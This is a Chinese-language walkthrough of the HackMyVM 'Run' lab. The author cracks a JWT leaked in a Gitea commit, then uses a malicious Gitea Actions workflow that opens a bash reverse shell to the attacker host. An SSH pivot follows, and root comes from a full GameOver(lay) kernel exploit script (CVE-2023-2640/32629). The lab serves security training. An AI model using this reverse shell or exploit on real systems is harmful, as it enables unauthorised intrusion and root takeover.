简介
难度:中等
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Run
本地环境
虚拟机:vitual box
靶场IP(Run):192.168.56.105
跳板机IP(windows 10):192.168.56.1 192.168.190.100
渗透机IP(ubuntu 22.04):192.168.190.30
扫描
用一下zenmap
nmap -p 1-65535 -T4 -A -v 192.168.56.105/32
只有3000端口!?
http
看起来是个私有git仓库
大概查看了一下代码说明,是一个用python跑的简单认证系统,然后一个比较关键的地方在这里
是的,点击commit之后就能获得项目的历史代码,然后这里泄露了jwt的token。随便找个网站解析一下
用户名是dev
然后把这个hash扔给hashcat,hash编号为16500(JWT)直接就可以识别并爆破出来
>hashcat -O -a 0 -m 16500 ./pass /root/Tool/HVV/8_dict/kali.txt
hashcat (v6.2.5) starting
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-13th Gen Intel(R) Core(TM) i9-13900K, 2196/4456 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache building /root/Tool/HVV/8_dict/kali.txt: 33553435
Dictionary cache built:
* Filename..: /root/Tool/HVV/8_dict/kali.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 0 secs
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcwNzE0ODY1OCwianRpIjoiNjAwMWI5N2YtZjllOC00YTIxLThlYWMtYmE5NWEwY2Y4MDQ4IiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldiIsIm5iZiI6MTcwNzE0ODY1OCwiY3NyZiI6ImFkZjdmOTBiLWQ2NDctNDljZS1hNGRhLTQ3NDI1OWZkYzcyYyIsImV4cCI6MTcwNzE0OTI1OCwidXNlcm5hbWUiOiJkZXYifQ.tRZPFKRfJV7T-EHyQiBFqDEE1hl83MyCGtaBpSMwU_o:developer88
密码为developer88
action攻击
先把仓库的Actions功能打开。这个玩意相当于设置了自定义触发条件的脚本,具体可以参考官方文档,还是很好理解的:https://docs.gitea.com/zh-cn/usage/actions/overview
我们看到项目本身已经连接到一个tag为run的全局runner,因为靶机只有一个,所以很容易推理出来run所在主机就是靶机
然后我们在攻击机上拉取项目,并创建文件.gitea/workflows/build.yaml
,向里面写入以下内容
name: shell
run-name: ${{ gitea.actor }} is testing out Gitea Actions 🚀
on: [push]
jobs:
Explore-Gitea-Actions:
runs-on: run
steps:
- run: echo "bash -c \"bash -i >& /dev/tcp/192.168.56.1/40001 0>&1\"" >> /tmp/shell.sh
- run: bash /tmp/shell.sh
on:[push]
就是在推送的时候执行脚本,然后runner就是run。最后直接合并即可得到shell
(action界面上还很贴心地标注着黑客的渗透进度)
提权
sudo -l起手
但是还早着……看起来是进入一个沙箱啥的,什么东西都没有。事实上大多数情况下runner就是靠docker起的
先看一下网络信息,其中得到网关地址
act@dcba37053483:/tmp$ ip route show
ip route show
default via 172.18.0.1 dev eth0
上传个fscan扫一下,看到22端口开启
act@dcba37053483:/tmp$ ./fscan -h 172.18.0.1/32 -no -nopoc
./fscan -h 172.18.0.1/32 -no -nopoc
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
172.18.0.1:22 open
172.18.0.1:3000 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://172.18.0.1:3000 code:200 len:13621 title:Gitea: Git with a cup of tea
[+] InfoScan http://172.18.0.1:3000 [Gitea简易Git服务]
ssh连上去
act@dcba37053483:/tmp$ ssh dev@172.18.0.1
ssh dev@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ED25519 key fingerprint is SHA256:IGhXsYmgq4sTpoMPHq+MgSiAiNHWOR4ZkocqlvZPGis.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Last login: Tue Feb 6 15:52:41 2024 from 172.18.0.4
dev@run:~$ ls
ls
user.txt
得到user.txt
内核漏洞提权
看看内核版本
uname -a
Linux run 6.2.0-20-generic #20-Ubuntu SMP PREEMPT_DYNAMIC Thu Apr 6 07:48:48 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
虽然版本很新,但是内核本身足够特殊,可以参考该项目:
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
exp.sh
#!/bin/bash
# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation
# by g1vi https://github.com/g1vi
# October 2023
echo "[+] You should be root now"
echo "[+] Type 'exit' to finish and leave the house cleaned"
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
靶机缺少gcc等环境,但是有python3,所以直接搞
dev@run:/tmp$ bash ./exp.sh
bash ./exp.sh
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
root@run:/tmp# id
id
uid=0(root) gid=1000(dev) groups=1000(dev)
成功提权